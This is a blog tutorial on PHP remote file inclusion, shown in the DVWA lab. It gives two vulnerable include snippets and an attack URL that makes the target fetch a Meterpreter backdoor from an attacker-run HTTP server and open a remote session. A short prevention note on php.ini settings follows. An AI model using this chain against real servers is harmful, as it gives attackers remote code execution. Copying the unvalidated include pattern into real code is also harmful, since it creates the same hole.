RFI (Remote File inclusion) to Meterpreter

Hello Hackers.
In this post I’ll show you some basic concepts of Remote File inclusion attack, know as RFI and talks about some  RFI working  and How to prevent those attacks from hackers or bad guys.

What is RFI ?

Remote file inclusion a.k.a RFI attack is a type of Web vulnerability mostly found in PHP Web servers. This vulnerability to allow attacker to include remote file in Target(RFI vulnerable) webserver and execute The vulnerability occurs due to the use of user-supplied input without proper validation.

 

Vulnerable Coding!!!

TYPE 1:

<?php 
// The page we wish to display 
$file = $_GET[ 'page' ]; 
include $file;
?>

TYPE 2:

<?php


// The page we wish to display but in this 
// HTML extension automatic appended by script

 $file = ($_GET['filename'].“.html”); 
 include $file;
?>

RFI Impact : Critical

 

Lets Start our Demo !

I’ll Demonstrate this attack one of Famous Vulnerable Web application DVWA. If you dont know about DVWA Read my article about What is DVWA and Setup DVWA .

The Damn Vulnerable Web Application aka DVWA  web application is intentionally  vulnerable of different kind of web application security issue.  There is Different Level for attacking. I m  going with Low level Security because of Basic understanding, First understand Basic of Remote file inclusion and then we go for High level of security .

 

In the url the page parameter is vulnerable to Remote file inclusion attack, Now lets Create the meterpreter back-door.

 

Now Start Webserver in my case i use python SimpleHTTPServer module, Just Type By

python -m SimpleHTTPServer <port_number>


Now open http://<your_ip>:8008/


now our Meterpreter backdoor path is http://10.0.0.8:8008/testbackdoor.php
To exploit this in vulnerale machine first setup our Meterpreter handler in msfconsole
To do this just follow simple commands in msf.

Our Handler Started.

now Run our shell in vulnerable machine in page parameter http://127.0.0.1/DVWA/vulnerabilities/fi/?page=http://10.0.0.8:8008/testbackdoor.php .

In above You can see that when i enter the my shell url in page parameter and Hit enter i got the meterpreter session now test our meterpreter session via different commands this attack Works in Type 1 of coding which i mention in above for type 2 comment here and you can write mail me i m happy to help you.

 

 

Thank You Guys. Feel Free to Contact me.

 

Apache Configuration:

File Location In linux :  /etc/php/7.0/apache2/php.ini  (Depending Your Version and System)

Insecure Configration Setting

Secure Configration Setting

If you Enjoying this. plzz Comment Below and Share this

This Post Has 2 Comments

  1. DON

    Nice idea with meterpreter i never thought of that +100 for this blog.

    1. Touhid Shaikh

      Thanks @DON but this is simple example of RFI.. stay tuned for latest update.

Leave a Reply